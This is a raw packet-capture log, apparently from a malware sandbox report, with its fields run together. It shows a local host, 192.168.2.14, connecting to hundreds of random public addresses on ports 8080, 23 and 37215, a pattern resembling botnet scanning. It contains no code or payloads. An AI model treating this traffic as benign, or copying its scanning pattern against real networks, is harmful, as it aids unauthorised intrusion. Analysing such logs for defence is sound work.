                                              Nov 23, 2023 05:14:49.031965017 CET478168080192.168.2.1495.242.57.217
                                              Nov 23, 2023 05:14:49.031965017 CET478168080192.168.2.1431.40.217.13
                                              Nov 23, 2023 05:14:49.031968117 CET478168080192.168.2.1494.26.135.249
                                              Nov 23, 2023 05:14:49.031985998 CET478168080192.168.2.1485.198.165.89
                                              Nov 23, 2023 05:14:49.031986952 CET478168080192.168.2.1431.193.144.24
                                              Nov 23, 2023 05:14:49.032008886 CET478168080192.168.2.1494.209.132.91
                                              Nov 23, 2023 05:14:49.032011986 CET478168080192.168.2.1485.101.81.3
                                              Nov 23, 2023 05:14:49.032012939 CET478168080192.168.2.1495.13.67.223
                                              Nov 23, 2023 05:14:49.032017946 CET478168080192.168.2.1495.108.138.10
                                              Nov 23, 2023 05:14:49.032017946 CET478168080192.168.2.1485.52.147.32
                                              Nov 23, 2023 05:14:49.032033920 CET478168080192.168.2.1431.85.101.18
                                              Nov 23, 2023 05:14:49.032033920 CET478168080192.168.2.1494.84.242.4
                                              Nov 23, 2023 05:14:49.032035112 CET478168080192.168.2.1494.76.112.224
                                              Nov 23, 2023 05:14:49.032047033 CET478168080192.168.2.1485.10.27.155
                                              Nov 23, 2023 05:14:49.032063007 CET478168080192.168.2.1431.237.26.247
                                              Nov 23, 2023 05:14:49.032064915 CET478168080192.168.2.1431.50.249.131
                                              Nov 23, 2023 05:14:49.032094955 CET478168080192.168.2.1494.87.174.106
                                              Nov 23, 2023 05:14:49.032095909 CET478168080192.168.2.1431.243.91.104
                                              Nov 23, 2023 05:14:49.032098055 CET478168080192.168.2.1431.119.24.85
                                              Nov 23, 2023 05:14:49.032098055 CET478168080192.168.2.1431.80.64.69
                                              Nov 23, 2023 05:14:49.032103062 CET478168080192.168.2.1494.70.81.25
                                              Nov 23, 2023 05:14:49.032114983 CET478168080192.168.2.1495.33.46.118
                                              Nov 23, 2023 05:14:49.032119989 CET478168080192.168.2.1462.152.14.184
                                              Nov 23, 2023 05:14:49.032128096 CET478168080192.168.2.1462.138.131.136
                                              Nov 23, 2023 05:14:49.032135010 CET478168080192.168.2.1494.197.87.192
                                              Nov 23, 2023 05:14:49.032141924 CET478168080192.168.2.1485.115.101.206
                                              Nov 23, 2023 05:14:49.032144070 CET478168080192.168.2.1494.76.63.201
                                              Nov 23, 2023 05:14:49.032185078 CET478168080192.168.2.1485.177.0.40
                                              Nov 23, 2023 05:14:49.032185078 CET478168080192.168.2.1495.27.225.152
                                              Nov 23, 2023 05:14:49.032191038 CET478168080192.168.2.1485.95.30.238
                                              Nov 23, 2023 05:14:49.032210112 CET478168080192.168.2.1495.174.117.145
                                              Nov 23, 2023 05:14:49.032226086 CET478168080192.168.2.1462.65.147.154
                                              Nov 23, 2023 05:14:49.032226086 CET478168080192.168.2.1431.35.75.3
                                              Nov 23, 2023 05:14:49.032227993 CET478168080192.168.2.1431.244.96.126
                                              Nov 23, 2023 05:14:49.032241106 CET478168080192.168.2.1462.0.120.212
                                              Nov 23, 2023 05:14:49.032241106 CET478168080192.168.2.1431.28.140.114
                                              Nov 23, 2023 05:14:49.032254934 CET478168080192.168.2.1431.230.62.192
                                              Nov 23, 2023 05:14:49.032267094 CET478168080192.168.2.1431.138.107.6
                                              Nov 23, 2023 05:14:49.032267094 CET478168080192.168.2.1494.195.87.176
                                              Nov 23, 2023 05:14:49.032319069 CET478168080192.168.2.1431.9.247.39
                                              Nov 23, 2023 05:14:49.032324076 CET478168080192.168.2.1431.89.173.0
                                              Nov 23, 2023 05:14:49.032337904 CET478168080192.168.2.1495.134.136.31
                                              Nov 23, 2023 05:14:49.032351971 CET478168080192.168.2.1485.161.9.227
                                              Nov 23, 2023 05:14:49.032351971 CET478168080192.168.2.1495.209.220.24
                                              Nov 23, 2023 05:14:49.032351971 CET478168080192.168.2.1485.166.83.41
                                              Nov 23, 2023 05:14:49.032351971 CET478168080192.168.2.1485.110.76.36
                                              Nov 23, 2023 05:14:49.032356024 CET478168080192.168.2.1462.10.6.148
                                              Nov 23, 2023 05:14:49.032358885 CET478168080192.168.2.1431.71.45.192
                                              Nov 23, 2023 05:14:49.032358885 CET478168080192.168.2.1462.204.239.9
                                              Nov 23, 2023 05:14:49.032358885 CET478168080192.168.2.1485.111.232.59
                                              Nov 23, 2023 05:14:49.032358885 CET478168080192.168.2.1494.43.106.240
                                              Nov 23, 2023 05:14:49.032361031 CET478168080192.168.2.1494.57.108.209
                                              Nov 23, 2023 05:14:49.032376051 CET478168080192.168.2.1495.18.102.191
                                              Nov 23, 2023 05:14:49.032402039 CET478168080192.168.2.1494.170.169.170
                                              Nov 23, 2023 05:14:49.032402992 CET478168080192.168.2.1485.162.50.205
                                              Nov 23, 2023 05:14:49.032413960 CET478168080192.168.2.1462.240.150.38
                                              Nov 23, 2023 05:14:49.032413960 CET478168080192.168.2.1494.103.37.58
                                              Nov 23, 2023 05:14:49.032432079 CET478168080192.168.2.1431.10.40.174
                                              Nov 23, 2023 05:14:49.032445908 CET478168080192.168.2.1485.37.185.77
                                              Nov 23, 2023 05:14:49.032445908 CET478168080192.168.2.1485.4.129.44
                                              Nov 23, 2023 05:14:49.032445908 CET478168080192.168.2.1495.34.2.13
                                              Nov 23, 2023 05:14:49.032447100 CET478168080192.168.2.1495.217.82.174
                                              Nov 23, 2023 05:14:49.032448053 CET478168080192.168.2.1431.220.80.111
                                              Nov 23, 2023 05:14:49.032453060 CET478168080192.168.2.1485.97.74.42
                                              Nov 23, 2023 05:14:49.032453060 CET478168080192.168.2.1485.230.76.178
                                              Nov 23, 2023 05:14:49.032453060 CET478168080192.168.2.1431.69.99.138
                                              Nov 23, 2023 05:14:49.032460928 CET478168080192.168.2.1462.82.118.35
                                              Nov 23, 2023 05:14:49.032475948 CET478168080192.168.2.1462.156.65.162
                                              Nov 23, 2023 05:14:49.032475948 CET478168080192.168.2.1462.153.179.198
                                              Nov 23, 2023 05:14:49.032484055 CET478168080192.168.2.1485.160.160.82
                                              Nov 23, 2023 05:14:49.032497883 CET478168080192.168.2.1494.65.188.150
                                              Nov 23, 2023 05:14:49.032497883 CET478168080192.168.2.1494.134.115.157
                                              Nov 23, 2023 05:14:49.032500982 CET478168080192.168.2.1431.26.163.114
                                              Nov 23, 2023 05:14:49.032506943 CET478168080192.168.2.1431.136.92.33
                                              Nov 23, 2023 05:14:49.032524109 CET478168080192.168.2.1462.233.189.136
                                              Nov 23, 2023 05:14:49.032535076 CET478168080192.168.2.1462.182.7.13
                                              Nov 23, 2023 05:14:49.032537937 CET478168080192.168.2.1485.28.70.58
                                              Nov 23, 2023 05:14:49.032542944 CET478168080192.168.2.1494.1.75.7
                                              Nov 23, 2023 05:14:49.032542944 CET478168080192.168.2.1494.154.103.15
                                              Nov 23, 2023 05:14:49.032552958 CET478168080192.168.2.1495.199.68.250
                                              Nov 23, 2023 05:14:49.032555103 CET478168080192.168.2.1485.92.224.233
                                              Nov 23, 2023 05:14:49.032588959 CET478168080192.168.2.1462.221.213.223
                                              Nov 23, 2023 05:14:49.032598972 CET478168080192.168.2.1462.228.53.132
                                              Nov 23, 2023 05:14:49.032599926 CET478168080192.168.2.1462.21.65.136
                                              Nov 23, 2023 05:14:49.032604933 CET478168080192.168.2.1431.73.230.66
                                              Nov 23, 2023 05:14:49.032604933 CET478168080192.168.2.1485.211.162.11
                                              Nov 23, 2023 05:14:49.032619953 CET478168080192.168.2.1431.197.240.15
                                              Nov 23, 2023 05:14:49.032636881 CET478168080192.168.2.1494.228.141.25
                                              Nov 23, 2023 05:14:49.032636881 CET478168080192.168.2.1495.163.224.196
                                              Nov 23, 2023 05:14:49.032636881 CET478168080192.168.2.1494.158.220.255
                                              Nov 23, 2023 05:14:49.032636881 CET478168080192.168.2.1462.17.219.206
                                              Nov 23, 2023 05:14:49.032650948 CET478168080192.168.2.1462.218.214.62
                                              Nov 23, 2023 05:14:49.032661915 CET478168080192.168.2.1485.59.78.202
                                              Nov 23, 2023 05:14:49.032666922 CET478168080192.168.2.1485.133.227.29
                                              Nov 23, 2023 05:14:49.032672882 CET478168080192.168.2.1495.210.183.20
                                              Nov 23, 2023 05:14:49.032672882 CET478168080192.168.2.1462.120.247.199
                                              Nov 23, 2023 05:14:49.032682896 CET478168080192.168.2.1462.42.167.201
                                              Nov 23, 2023 05:14:49.032686949 CET478168080192.168.2.1431.68.73.34
                                              Nov 23, 2023 05:14:49.032689095 CET478168080192.168.2.1462.173.3.236
                                              Nov 23, 2023 05:14:49.032701969 CET478168080192.168.2.1485.220.20.140
                                              Nov 23, 2023 05:14:49.032701969 CET478168080192.168.2.1431.77.73.96
                                              Nov 23, 2023 05:14:49.032711029 CET478168080192.168.2.1494.185.203.136
                                              Nov 23, 2023 05:14:49.032715082 CET478168080192.168.2.1462.15.213.214
                                              Nov 23, 2023 05:14:49.032721043 CET478168080192.168.2.1485.250.246.162
                                              Nov 23, 2023 05:14:49.032730103 CET478168080192.168.2.1494.103.192.254
                                              Nov 23, 2023 05:14:49.032743931 CET478168080192.168.2.1462.205.165.222
                                              Nov 23, 2023 05:14:49.032744884 CET478168080192.168.2.1431.73.193.134
                                              Nov 23, 2023 05:14:49.032744884 CET478168080192.168.2.1462.2.135.56
                                              Nov 23, 2023 05:14:49.032761097 CET478168080192.168.2.1495.102.206.80
                                              Nov 23, 2023 05:14:49.032782078 CET478168080192.168.2.1431.187.162.246
                                              Nov 23, 2023 05:14:49.032782078 CET478168080192.168.2.1462.12.226.236
                                              Nov 23, 2023 05:14:49.032783985 CET478168080192.168.2.1431.173.220.207
                                              Nov 23, 2023 05:14:49.032785892 CET478168080192.168.2.1462.48.168.63
                                              Nov 23, 2023 05:14:49.032803059 CET478168080192.168.2.1431.237.118.136
                                              Nov 23, 2023 05:14:49.032824039 CET478168080192.168.2.1485.245.10.118
                                              Nov 23, 2023 05:14:49.032825947 CET478168080192.168.2.1462.191.227.95
                                              Nov 23, 2023 05:14:49.032838106 CET478168080192.168.2.1494.22.110.143
                                              Nov 23, 2023 05:14:49.032843113 CET478168080192.168.2.1485.183.185.9
                                              Nov 23, 2023 05:14:49.032844067 CET478168080192.168.2.1495.236.191.137
                                              Nov 23, 2023 05:14:49.032844067 CET478168080192.168.2.1431.65.229.81
                                              Nov 23, 2023 05:14:49.032844067 CET478168080192.168.2.1462.24.89.7
                                              Nov 23, 2023 05:14:49.032845020 CET478168080192.168.2.1431.210.176.126
                                              Nov 23, 2023 05:14:49.032845020 CET478168080192.168.2.1494.7.203.92
                                              Nov 23, 2023 05:14:49.032867908 CET478168080192.168.2.1494.212.146.186
                                              Nov 23, 2023 05:14:49.032867908 CET478168080192.168.2.1485.232.52.230
                                              Nov 23, 2023 05:14:49.032886028 CET478168080192.168.2.1431.99.100.172
                                              Nov 23, 2023 05:14:49.032903910 CET478168080192.168.2.1462.121.186.10
                                              Nov 23, 2023 05:14:49.032923937 CET478168080192.168.2.1494.117.101.200
                                              Nov 23, 2023 05:14:49.032926083 CET478168080192.168.2.1495.73.241.171
                                              Nov 23, 2023 05:14:49.032927036 CET478168080192.168.2.1494.207.190.24
                                              Nov 23, 2023 05:14:49.032927036 CET478168080192.168.2.1431.70.43.236
                                              Nov 23, 2023 05:14:49.032927036 CET478168080192.168.2.1462.246.82.34
                                              Nov 23, 2023 05:14:49.032929897 CET478168080192.168.2.1494.230.76.143
                                              Nov 23, 2023 05:14:49.032962084 CET478168080192.168.2.1494.7.155.81
                                              Nov 23, 2023 05:14:49.032964945 CET478168080192.168.2.1431.162.69.113
                                              Nov 23, 2023 05:14:49.032965899 CET478168080192.168.2.1462.178.184.248
                                              Nov 23, 2023 05:14:49.032964945 CET478168080192.168.2.1431.13.243.246
                                              Nov 23, 2023 05:14:49.033003092 CET478168080192.168.2.1485.175.111.98
                                              Nov 23, 2023 05:14:49.033003092 CET478168080192.168.2.1462.74.31.217
                                              Nov 23, 2023 05:14:49.033004045 CET478168080192.168.2.1485.164.108.148
                                              Nov 23, 2023 05:14:49.033018112 CET478168080192.168.2.1495.221.208.108
                                              Nov 23, 2023 05:14:49.033041954 CET478168080192.168.2.1462.110.236.44
                                              Nov 23, 2023 05:14:49.033085108 CET478168080192.168.2.1494.89.98.15
                                              Nov 23, 2023 05:14:49.033085108 CET478168080192.168.2.1494.136.215.28
                                              Nov 23, 2023 05:14:49.130260944 CET2347828216.17.12.63192.168.2.14
                                              Nov 23, 2023 05:14:49.193391085 CET234782895.232.183.70192.168.2.14
                                              Nov 23, 2023 05:14:49.200548887 CET234782878.24.223.41192.168.2.14
                                              Nov 23, 2023 05:14:49.203773022 CET80804781662.232.220.89192.168.2.14
                                              Nov 23, 2023 05:14:49.212519884 CET80804781662.119.102.146192.168.2.14
                                              Nov 23, 2023 05:14:49.214409113 CET80804781631.136.28.87192.168.2.14
                                              Nov 23, 2023 05:14:49.214489937 CET478168080192.168.2.1431.136.28.87
                                              Nov 23, 2023 05:14:49.221584082 CET80804781685.163.50.66192.168.2.14
                                              Nov 23, 2023 05:14:49.226986885 CET80804781662.28.19.151192.168.2.14
                                              Nov 23, 2023 05:14:49.232644081 CET80804781662.72.185.106192.168.2.14
                                              Nov 23, 2023 05:14:49.246197939 CET23478285.166.87.111192.168.2.14
                                              Nov 23, 2023 05:14:49.247044086 CET3721547830197.9.157.243192.168.2.14
                                              Nov 23, 2023 05:14:49.247405052 CET80804781694.122.104.168192.168.2.14
                                              Nov 23, 2023 05:14:49.247474909 CET478168080192.168.2.1494.122.104.168
                                              Nov 23, 2023 05:14:49.250564098 CET80804781694.122.6.45192.168.2.14
                                              Nov 23, 2023 05:14:49.250627041 CET478168080192.168.2.1494.122.6.45
                                              Nov 23, 2023 05:14:49.250832081 CET80804781694.131.145.204192.168.2.14
                                              Nov 23, 2023 05:14:49.251576900 CET80804781695.87.217.88192.168.2.14
                                              Nov 23, 2023 05:14:49.255212069 CET80804781694.121.186.157192.168.2.14
                                              Nov 23, 2023 05:14:49.255287886 CET478168080192.168.2.1494.121.186.157
                                              Nov 23, 2023 05:14:49.255841017 CET80804781694.120.12.111192.168.2.14
                                              Nov 23, 2023 05:14:49.255901098 CET478168080192.168.2.1494.120.12.111
                                              Nov 23, 2023 05:14:49.255974054 CET80804781685.187.177.16192.168.2.14
                                              Nov 23, 2023 05:14:49.259130001 CET2347828126.234.202.51192.168.2.14
                                              Nov 23, 2023 05:14:49.262109041 CET234782895.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:49.262154102 CET4782823192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:49.262332916 CET80804781694.64.14.98192.168.2.14
                                              Nov 23, 2023 05:14:49.262372017 CET478168080192.168.2.1494.64.14.98
                                              Nov 23, 2023 05:14:49.267003059 CET80804781685.97.148.229192.168.2.14
                                              Nov 23, 2023 05:14:49.273457050 CET2347828160.24.141.27192.168.2.14
                                              Nov 23, 2023 05:14:49.286112070 CET234782814.61.181.70192.168.2.14
                                              Nov 23, 2023 05:14:49.288681030 CET80804781694.20.50.42192.168.2.14
                                              Nov 23, 2023 05:14:49.298027992 CET2347828121.162.239.219192.168.2.14
                                              Nov 23, 2023 05:14:49.328272104 CET372154783041.84.151.7192.168.2.14
                                              Nov 23, 2023 05:14:49.585273027 CET2347828160.161.143.43192.168.2.14
                                              Nov 23, 2023 05:14:49.608089924 CET80804781694.240.114.86192.168.2.14
                                              Nov 23, 2023 05:14:49.608190060 CET478168080192.168.2.1494.240.114.86
                                              Nov 23, 2023 05:14:49.997720003 CET4782823192.168.2.14218.58.21.168
                                              Nov 23, 2023 05:14:49.997720957 CET4782823192.168.2.1442.98.154.117
                                              Nov 23, 2023 05:14:49.997726917 CET4782823192.168.2.14254.211.208.71
                                              Nov 23, 2023 05:14:49.997730017 CET4782823192.168.2.1442.69.18.111
                                              Nov 23, 2023 05:14:49.997730017 CET4782823192.168.2.1468.33.87.239
                                              Nov 23, 2023 05:14:49.997726917 CET4782823192.168.2.14206.63.166.246
                                              Nov 23, 2023 05:14:49.997747898 CET4782823192.168.2.1460.93.27.237
                                              Nov 23, 2023 05:14:49.997747898 CET4782823192.168.2.14136.51.219.68
                                              Nov 23, 2023 05:14:49.997747898 CET4782823192.168.2.1469.111.190.89
                                              Nov 23, 2023 05:14:49.997747898 CET4782823192.168.2.1495.145.237.87
                                              Nov 23, 2023 05:14:49.997755051 CET4782823192.168.2.14185.235.85.229
                                              Nov 23, 2023 05:14:49.997766972 CET4782823192.168.2.1463.104.15.50
                                              Nov 23, 2023 05:14:49.997766972 CET4782823192.168.2.14112.242.24.150
                                              Nov 23, 2023 05:14:49.997766972 CET4782823192.168.2.1432.27.239.12
                                              Nov 23, 2023 05:14:49.997767925 CET4782823192.168.2.14255.48.209.230
                                              Nov 23, 2023 05:14:49.997767925 CET4782823192.168.2.1424.42.37.205
                                              Nov 23, 2023 05:14:49.997781038 CET4782823192.168.2.14250.238.81.138
                                              Nov 23, 2023 05:14:49.997788906 CET4782823192.168.2.14248.1.191.226
                                              Nov 23, 2023 05:14:49.997796059 CET4782823192.168.2.14108.141.114.135
                                              Nov 23, 2023 05:14:49.997796059 CET4782823192.168.2.1419.37.24.140
                                              Nov 23, 2023 05:14:49.997800112 CET4782823192.168.2.1477.202.139.236
                                              Nov 23, 2023 05:14:49.997796059 CET4782823192.168.2.1442.37.75.222
                                              Nov 23, 2023 05:14:49.997802019 CET4782823192.168.2.14121.32.170.226
                                              Nov 23, 2023 05:14:49.997807980 CET4782823192.168.2.1465.62.208.255
                                              Nov 23, 2023 05:14:49.997807980 CET4782823192.168.2.1478.227.140.155
                                              Nov 23, 2023 05:14:49.997821093 CET4782823192.168.2.1483.240.199.13
                                              Nov 23, 2023 05:14:49.997834921 CET4782823192.168.2.1499.94.183.142
                                              Nov 23, 2023 05:14:49.997834921 CET4782823192.168.2.1485.152.242.170
                                              Nov 23, 2023 05:14:49.997843027 CET4782823192.168.2.1447.73.186.83
                                              Nov 23, 2023 05:14:49.997843027 CET4782823192.168.2.14180.182.176.177
                                              Nov 23, 2023 05:14:49.997834921 CET4782823192.168.2.1439.217.88.105
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14105.67.145.240
                                              Nov 23, 2023 05:14:49.997853041 CET4782823192.168.2.14250.172.172.126
                                              Nov 23, 2023 05:14:49.997852087 CET4782823192.168.2.14125.155.190.169
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14191.48.139.245
                                              Nov 23, 2023 05:14:49.997857094 CET4782823192.168.2.1461.104.31.214
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14110.229.235.116
                                              Nov 23, 2023 05:14:49.997853041 CET4782823192.168.2.14207.105.160.214
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14240.181.20.192
                                              Nov 23, 2023 05:14:49.997852087 CET4782823192.168.2.14199.105.92.149
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14163.174.206.251
                                              Nov 23, 2023 05:14:49.997852087 CET4782823192.168.2.14190.204.193.220
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14114.118.250.205
                                              Nov 23, 2023 05:14:49.997855902 CET4782823192.168.2.14216.115.110.192
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14218.135.240.233
                                              Nov 23, 2023 05:14:49.997855902 CET4782823192.168.2.14207.17.154.146
                                              Nov 23, 2023 05:14:49.997845888 CET4782823192.168.2.14100.145.148.215
                                              Nov 23, 2023 05:14:49.997869968 CET4782823192.168.2.14115.69.9.136
                                              Nov 23, 2023 05:14:49.997876883 CET4782823192.168.2.1481.81.43.200
                                              Nov 23, 2023 05:14:49.997876883 CET4782823192.168.2.14241.101.70.154
                                              Nov 23, 2023 05:14:49.997889042 CET4782823192.168.2.14133.161.67.145
                                              Nov 23, 2023 05:14:49.997896910 CET4782823192.168.2.14155.223.238.38
                                              Nov 23, 2023 05:14:49.997896910 CET4782823192.168.2.1467.138.14.1
                                              Nov 23, 2023 05:14:49.997925043 CET4782823192.168.2.14150.151.159.227
                                              Nov 23, 2023 05:14:49.997927904 CET4782823192.168.2.14206.96.146.16
                                              Nov 23, 2023 05:14:49.997945070 CET4782823192.168.2.14216.36.79.70
                                              Nov 23, 2023 05:14:49.997961044 CET4782823192.168.2.14109.255.61.118
                                              Nov 23, 2023 05:14:49.997962952 CET4782823192.168.2.14178.217.123.121
                                              Nov 23, 2023 05:14:49.997962952 CET4782823192.168.2.14180.114.178.9
                                              Nov 23, 2023 05:14:49.997963905 CET4782823192.168.2.14175.62.52.55
                                              Nov 23, 2023 05:14:49.997963905 CET4782823192.168.2.14243.117.186.128
                                              Nov 23, 2023 05:14:49.997963905 CET4782823192.168.2.14220.42.171.57
                                              Nov 23, 2023 05:14:49.997963905 CET4782823192.168.2.1489.79.101.95
                                              Nov 23, 2023 05:14:49.997963905 CET4782823192.168.2.1441.33.117.147
                                              Nov 23, 2023 05:14:49.997965097 CET4782823192.168.2.14180.73.96.43
                                              Nov 23, 2023 05:14:49.997965097 CET4782823192.168.2.14253.10.79.130
                                              Nov 23, 2023 05:14:49.997978926 CET4782823192.168.2.1434.169.31.40
                                              Nov 23, 2023 05:14:49.997980118 CET4782823192.168.2.1475.120.109.51
                                              Nov 23, 2023 05:14:49.997982025 CET4782823192.168.2.14213.125.43.228
                                              Nov 23, 2023 05:14:49.997994900 CET4782823192.168.2.14152.102.179.132
                                              Nov 23, 2023 05:14:49.997997999 CET4782823192.168.2.145.69.103.96
                                              Nov 23, 2023 05:14:49.998008966 CET4782823192.168.2.14210.253.92.159
                                              Nov 23, 2023 05:14:49.998012066 CET4782823192.168.2.14140.224.229.174
                                              Nov 23, 2023 05:14:49.998023033 CET4782823192.168.2.1463.102.121.99
                                              Nov 23, 2023 05:14:49.998027086 CET4782823192.168.2.14211.209.187.71
                                              Nov 23, 2023 05:14:49.998028994 CET4782823192.168.2.1482.121.185.105
                                              Nov 23, 2023 05:14:49.998049021 CET4782823192.168.2.14162.247.224.69
                                              Nov 23, 2023 05:14:49.998051882 CET4782823192.168.2.1465.224.160.191
                                              Nov 23, 2023 05:14:49.998064995 CET4782823192.168.2.14252.126.156.117
                                              Nov 23, 2023 05:14:49.998064995 CET4782823192.168.2.14147.54.184.161
                                              Nov 23, 2023 05:14:49.998071909 CET4782823192.168.2.145.221.253.30
                                              Nov 23, 2023 05:14:49.998080969 CET4782823192.168.2.14115.43.193.116
                                              Nov 23, 2023 05:14:49.998095036 CET4782823192.168.2.14159.239.23.234
                                              Nov 23, 2023 05:14:49.998096943 CET4782823192.168.2.14213.122.82.147
                                              Nov 23, 2023 05:14:49.998111010 CET4782823192.168.2.14184.191.113.66
                                              Nov 23, 2023 05:14:49.998111010 CET4782823192.168.2.14201.239.81.10
                                              Nov 23, 2023 05:14:49.998112917 CET4782823192.168.2.1488.105.121.99
                                              Nov 23, 2023 05:14:49.998119116 CET4782823192.168.2.1476.252.101.65
                                              Nov 23, 2023 05:14:49.998132944 CET4782823192.168.2.14208.118.56.64
                                              Nov 23, 2023 05:14:49.998136044 CET4782823192.168.2.14141.86.57.52
                                              Nov 23, 2023 05:14:49.998150110 CET4782823192.168.2.14160.58.147.47
                                              Nov 23, 2023 05:14:49.998152018 CET4782823192.168.2.14111.21.6.18
                                              Nov 23, 2023 05:14:49.998152018 CET4782823192.168.2.14178.44.38.199
                                              Nov 23, 2023 05:14:49.998166084 CET4782823192.168.2.1489.216.122.164
                                              Nov 23, 2023 05:14:49.998167038 CET4782823192.168.2.14218.195.76.248
                                              Nov 23, 2023 05:14:49.998167038 CET4782823192.168.2.14200.235.127.205
                                              Nov 23, 2023 05:14:49.998183012 CET4782823192.168.2.14149.198.101.148
                                              Nov 23, 2023 05:14:49.998183012 CET4782823192.168.2.14205.180.117.179
                                              Nov 23, 2023 05:14:49.998188972 CET4782823192.168.2.14147.225.46.225
                                              Nov 23, 2023 05:14:49.998189926 CET4782823192.168.2.1442.212.65.79
                                              Nov 23, 2023 05:14:49.998202085 CET4782823192.168.2.1492.107.16.116
                                              Nov 23, 2023 05:14:49.998204947 CET4782823192.168.2.14216.69.44.2
                                              Nov 23, 2023 05:14:49.998207092 CET4782823192.168.2.1474.61.157.62
                                              Nov 23, 2023 05:14:49.998220921 CET4782823192.168.2.1471.149.82.126
                                              Nov 23, 2023 05:14:49.998220921 CET4782823192.168.2.1435.27.32.10
                                              Nov 23, 2023 05:14:49.998224974 CET4782823192.168.2.14169.39.5.103
                                              Nov 23, 2023 05:14:49.998238087 CET4782823192.168.2.14118.242.90.188
                                              Nov 23, 2023 05:14:49.998241901 CET4782823192.168.2.14243.241.7.7
                                              Nov 23, 2023 05:14:49.998241901 CET4782823192.168.2.14212.63.10.176
                                              Nov 23, 2023 05:14:49.998255968 CET4782823192.168.2.14144.40.75.245
                                              Nov 23, 2023 05:14:49.998255014 CET4782823192.168.2.14145.115.178.202
                                              Nov 23, 2023 05:14:49.998258114 CET4782823192.168.2.14141.59.71.12
                                              Nov 23, 2023 05:14:49.998269081 CET4782823192.168.2.14117.129.119.191
                                              Nov 23, 2023 05:14:49.998281956 CET4782823192.168.2.1481.55.140.112
                                              Nov 23, 2023 05:14:49.998289108 CET4782823192.168.2.14126.17.211.51
                                              Nov 23, 2023 05:14:49.998295069 CET4782823192.168.2.1424.225.140.202
                                              Nov 23, 2023 05:14:49.998306990 CET4782823192.168.2.14121.242.224.122
                                              Nov 23, 2023 05:14:49.998316050 CET4782823192.168.2.14142.237.160.218
                                              Nov 23, 2023 05:14:49.998317957 CET4782823192.168.2.14190.27.126.87
                                              Nov 23, 2023 05:14:49.998317957 CET4782823192.168.2.142.43.184.38
                                              Nov 23, 2023 05:14:49.998332024 CET4782823192.168.2.1457.143.82.6
                                              Nov 23, 2023 05:14:49.998333931 CET4782823192.168.2.1443.4.236.105
                                              Nov 23, 2023 05:14:49.998333931 CET4782823192.168.2.14194.36.234.202
                                              Nov 23, 2023 05:14:49.998349905 CET4782823192.168.2.14243.176.105.208
                                              Nov 23, 2023 05:14:49.998351097 CET4782823192.168.2.14136.174.147.199
                                              Nov 23, 2023 05:14:49.998353004 CET4782823192.168.2.14212.240.129.244
                                              Nov 23, 2023 05:14:49.998353958 CET4782823192.168.2.14106.243.72.158
                                              Nov 23, 2023 05:14:49.998363018 CET4782823192.168.2.14135.46.142.126
                                              Nov 23, 2023 05:14:49.998369932 CET4782823192.168.2.1416.107.100.204
                                              Nov 23, 2023 05:14:49.998370886 CET4782823192.168.2.14196.54.193.207
                                              Nov 23, 2023 05:14:49.998378038 CET4782823192.168.2.14158.167.94.118
                                              Nov 23, 2023 05:14:49.998397112 CET4782823192.168.2.14141.182.175.214
                                              Nov 23, 2023 05:14:49.998397112 CET4782823192.168.2.14104.153.122.7
                                              Nov 23, 2023 05:14:49.998399019 CET4782823192.168.2.14249.41.35.103
                                              Nov 23, 2023 05:14:49.998399973 CET4782823192.168.2.14124.128.56.74
                                              Nov 23, 2023 05:14:49.998400927 CET4782823192.168.2.1432.19.47.237
                                              Nov 23, 2023 05:14:49.998409033 CET4782823192.168.2.14103.33.124.45
                                              Nov 23, 2023 05:14:49.998419046 CET4782823192.168.2.1434.0.212.210
                                              Nov 23, 2023 05:14:49.998429060 CET4782823192.168.2.148.127.46.47
                                              Nov 23, 2023 05:14:49.998439074 CET4782823192.168.2.14197.13.176.59
                                              Nov 23, 2023 05:14:49.998440027 CET4782823192.168.2.1458.3.164.242
                                              Nov 23, 2023 05:14:49.998442888 CET4782823192.168.2.14189.231.152.244
                                              Nov 23, 2023 05:14:49.998447895 CET4782823192.168.2.14160.236.139.165
                                              Nov 23, 2023 05:14:49.998460054 CET4782823192.168.2.14150.46.255.96
                                              Nov 23, 2023 05:14:49.998460054 CET4782823192.168.2.14216.192.173.58
                                              Nov 23, 2023 05:14:49.998460054 CET4782823192.168.2.14193.204.174.147
                                              Nov 23, 2023 05:14:49.998462915 CET4782823192.168.2.141.31.226.21
                                              Nov 23, 2023 05:14:49.998467922 CET4782823192.168.2.1432.94.91.28
                                              Nov 23, 2023 05:14:49.998476028 CET4782823192.168.2.1432.38.43.56
                                              Nov 23, 2023 05:14:49.998477936 CET4782823192.168.2.1469.89.17.197
                                              Nov 23, 2023 05:14:49.998478889 CET4782823192.168.2.1442.208.18.181
                                              Nov 23, 2023 05:14:49.998490095 CET4782823192.168.2.14181.43.129.100
                                              Nov 23, 2023 05:14:49.998497963 CET4782823192.168.2.14171.2.233.199
                                              Nov 23, 2023 05:14:49.998500109 CET4782823192.168.2.1484.114.207.127
                                              Nov 23, 2023 05:14:49.998511076 CET4782823192.168.2.14182.80.104.149
                                              Nov 23, 2023 05:14:49.998514891 CET4782823192.168.2.1438.131.213.114
                                              Nov 23, 2023 05:14:49.998541117 CET4782823192.168.2.1419.97.226.175
                                              Nov 23, 2023 05:14:49.998544931 CET4782823192.168.2.14184.46.55.226
                                              Nov 23, 2023 05:14:49.998563051 CET4782823192.168.2.1492.88.189.217
                                              Nov 23, 2023 05:14:49.998569965 CET4782823192.168.2.14184.179.132.253
                                              Nov 23, 2023 05:14:49.998573065 CET4782823192.168.2.14197.176.77.50
                                              Nov 23, 2023 05:14:49.998573065 CET4782823192.168.2.1485.48.249.30
                                              Nov 23, 2023 05:14:49.998579025 CET4782823192.168.2.1432.164.222.75
                                              Nov 23, 2023 05:14:49.998589993 CET4782823192.168.2.14187.231.92.152
                                              Nov 23, 2023 05:14:49.998591900 CET4782823192.168.2.1465.146.246.213
                                              Nov 23, 2023 05:14:49.998605013 CET4782823192.168.2.1424.77.4.97
                                              Nov 23, 2023 05:14:49.998608112 CET4782823192.168.2.14219.147.201.236
                                              Nov 23, 2023 05:14:49.998621941 CET4782823192.168.2.14163.170.242.17
